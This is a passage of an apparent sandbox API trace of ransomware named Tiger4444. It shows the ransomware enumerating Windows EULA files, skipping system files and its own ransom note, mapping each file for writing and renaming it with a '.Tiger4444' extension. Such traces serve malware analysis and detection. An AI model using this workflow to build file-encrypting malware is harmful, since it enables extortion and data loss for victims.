lpString2="bootmgr") returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="pagefile.sys") returned -1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="boot") returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="ids.txt") returned -1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="NTUSER.DAT") returned -1 [0044.152] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_nl-nl.htm" | out: lpString1="EULA_nl-nl.htm") returned="EULA_nl-nl.htm" [0044.152] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm", dwFileAttributes=0x0) returned 1 [0044.153] lstrlenW (lpString="EULA_nl-nl.htm") returned 14 [0044.154] lstrlenW (lpString="Tiger4444") returned 9 [0044.154] lstrcmpiW (lpString1="nl-nl.htm", lpString2="Tiger4444") returned -1 [0044.154] lstrlenW (lpString=".dll") returned 4 [0044.154] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.154] lstrlenW (lpString=".lnk") returned 4 [0044.154] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.154] lstrlenW (lpString=".ini") returned 4 [0044.154] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.154] lstrlenW (lpString=".sys") returned 4 [0044.154] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.154] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.154] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.154] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13560706119) returned 1 [0044.154] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=67224) returned 1 [0044.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0044.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0044.154] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x109a0, lpName=0x0) returned 0x2c8 [0044.155] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109a0) returned 0xbe0000 [0044.158] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.158] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.158] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.158] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0044.158] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13561132319) returned 1 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0044.158] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0044.158] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.159] CloseHandle (hObject=0x2c8) returned 1 [0044.159] CloseHandle (hObject=0x260) returned 1 [0044.161] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.Tiger4444") returned 62 [0044.161] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.162] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=67232 | out: Addend=0xc6f980) returned 13065856 [0044.162] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4125 [0044.162] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ff747, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ff747, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x13f94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pl-pl.htm", cAlternateFileName="EULA_P~1.HTM")) returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="Tiger4444.exe") returned -1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2=".") returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="..") returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="windows") returned -1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="bootmgr") returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="pagefile.sys") returned -1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="boot") returned 1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="ids.txt") returned -1 [0044.162] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="NTUSER.DAT") returned -1 [0044.162] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_pl-pl.htm" | out: lpString1="EULA_pl-pl.htm") returned="EULA_pl-pl.htm" [0044.162] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm", dwFileAttributes=0x0) returned 1 [0044.163] lstrlenW (lpString="EULA_pl-pl.htm") returned 14 [0044.163] lstrlenW (lpString="Tiger4444") returned 9 [0044.163] lstrcmpiW (lpString1="pl-pl.htm", lpString2="Tiger4444") returned -1 [0044.163] lstrlenW (lpString=".dll") returned 4 [0044.163] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.163] lstrlenW (lpString=".lnk") returned 4 [0044.163] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.163] lstrlenW (lpString=".ini") returned 4 [0044.163] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.163] lstrlenW (lpString=".sys") returned 4 [0044.163] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.163] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.163] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.163] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13561612561) returned 1 [0044.163] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=81812) returned 1 [0044.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0044.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0044.163] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x142a0, lpName=0x0) returned 0x2c8 [0044.164] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x142a0) returned 0xbe0000 [0044.168] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.168] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.168] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.168] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.168] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.168] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13562159798) returned 1 [0044.169] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0044.169] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0044.169] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.169] CloseHandle (hObject=0x2c8) returned 1 [0044.169] CloseHandle (hObject=0x260) returned 1 [0044.172] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.Tiger4444") returned 62 [0044.172] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.172] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=81824 | out: Addend=0xc6f980) returned 13133088 [0044.172] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4129 [0044.172] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea400ac7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea400ac7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10ac4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pt-br.htm", cAlternateFileName="EULA_P~2.HTM")) returned 1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="Tiger4444.exe") returned -1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2=".") returned 1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="..") returned 1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="windows") returned -1 [0044.172] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="bootmgr") returned 1 [0044.173] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="pagefile.sys") returned -1 [0044.173] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="boot") returned 1 [0044.173] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="ids.txt") returned -1 [0044.173] lstrcmpiW (lpString1="EULA_pt-br.htm", lpString2="NTUSER.DAT") returned -1 [0044.173] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_pt-br.htm" | out: lpString1="EULA_pt-br.htm") returned="EULA_pt-br.htm" [0044.173] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm", dwFileAttributes=0x0) returned 1 [0044.173] lstrlenW (lpString="EULA_pt-br.htm") returned 14 [0044.173] lstrlenW (lpString="Tiger4444") returned 9 [0044.173] lstrcmpiW (lpString1="pt-br.htm", lpString2="Tiger4444") returned -1 [0044.173] lstrlenW (lpString=".dll") returned 4 [0044.173] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.173] lstrlenW (lpString=".lnk") returned 4 [0044.173] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.173] lstrlenW (lpString=".ini") returned 4 [0044.173] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.174] lstrlenW (lpString=".sys") returned 4 [0044.174] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.174] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.174] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.174] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13562680742) returned 1 [0044.174] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=68292) returned 1 [0044.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0044.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0044.174] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10dd0, lpName=0x0) returned 0x2c8 [0044.175] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10dd0) returned 0xbe0000 [0044.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0044.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0044.179] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13563221968) returned 1 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0044.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0044.179] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.180] CloseHandle (hObject=0x2c8) returned 1 [0044.180] CloseHandle (hObject=0x260) returned 1 [0044.182] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.Tiger4444") returned 62 [0044.182] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-br.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-br.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.183] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=68304 | out: Addend=0xc6f980) returned 13214912 [0044.183] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4134 [0044.183] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea401e7f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea401e7f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1158e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pt-pt.htm", cAlternateFileName="EULA_P~3.HTM")) returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="Tiger4444.exe") returned -1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2=".") returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="..") returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="windows") returned -1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="bootmgr") returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="pagefile.sys") returned -1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="boot") returned 1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="ids.txt") returned -1 [0044.183] lstrcmpiW (lpString1="EULA_pt-pt.htm", lpString2="NTUSER.DAT") returned -1 [0044.183] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_pt-pt.htm" | out: lpString1="EULA_pt-pt.htm") returned="EULA_pt-pt.htm" [0044.183] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm", dwFileAttributes=0x0) returned 1 [0044.183] lstrlenW (lpString="EULA_pt-pt.htm") returned 14 [0044.184] lstrlenW (lpString="Tiger4444") returned 9 [0044.184] lstrcmpiW (lpString1="pt-pt.htm", lpString2="Tiger4444") returned -1 [0044.184] lstrlenW (lpString=".dll") returned 4 [0044.184] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.184] lstrlenW (lpString=".lnk") returned 4 [0044.184] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.184] lstrlenW (lpString=".ini") returned 4 [0044.184] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.184] lstrlenW (lpString=".sys") returned 4 [0044.184] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.184] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.184] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.184] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13563700763) returned 1 [0044.184] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=71054) returned 1 [0044.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0044.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0044.184] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11890, lpName=0x0) returned 0x2c8 [0044.185] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11890) returned 0xbe0000 [0044.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.189] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.189] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13564237043) returned 1 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0044.189] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0044.189] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.190] CloseHandle (hObject=0x2c8) returned 1 [0044.190] CloseHandle (hObject=0x260) returned 1 [0044.192] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.Tiger4444") returned 62 [0044.192] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pt-pt.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pt-pt.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.193] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=71056 | out: Addend=0xc6f980) returned 13283216 [0044.193] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4139 [0044.193] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5c6190, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5c6190, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ro-ro.htm", cAlternateFileName="EULA_R~1.HTM")) returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="Tiger4444.exe") returned -1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2=".") returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="..") returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="windows") returned -1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="bootmgr") returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="pagefile.sys") returned -1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="boot") returned 1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="ids.txt") returned -1 [0044.193] lstrcmpiW (lpString1="EULA_ro-ro.htm", lpString2="NTUSER.DAT") returned -1 [0044.193] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_ro-ro.htm" | out: lpString1="EULA_ro-ro.htm") returned="EULA_ro-ro.htm" [0044.193] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm", dwFileAttributes=0x0) returned 1 [0044.194] lstrlenW (lpString="EULA_ro-ro.htm") returned 14 [0044.194] lstrlenW (lpString="Tiger4444") returned 9 [0044.194] lstrcmpiW (lpString1="ro-ro.htm", lpString2="Tiger4444") returned -1 [0044.194] lstrlenW (lpString=".dll") returned 4 [0044.194] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.194] lstrlenW (lpString=".lnk") returned 4 [0044.194] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.194] lstrlenW (lpString=".ini") returned 4 [0044.194] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.194] lstrlenW (lpString=".sys") returned 4 [0044.194] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.194] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.195] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.195] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13564769957) returned 1 [0044.195] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=78176) returned 1 [0044.195] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0044.195] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0044.195] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13460, lpName=0x0) returned 0x2c8 [0044.196] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13460) returned 0xbe0000 [0044.199] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.199] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0044.199] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | 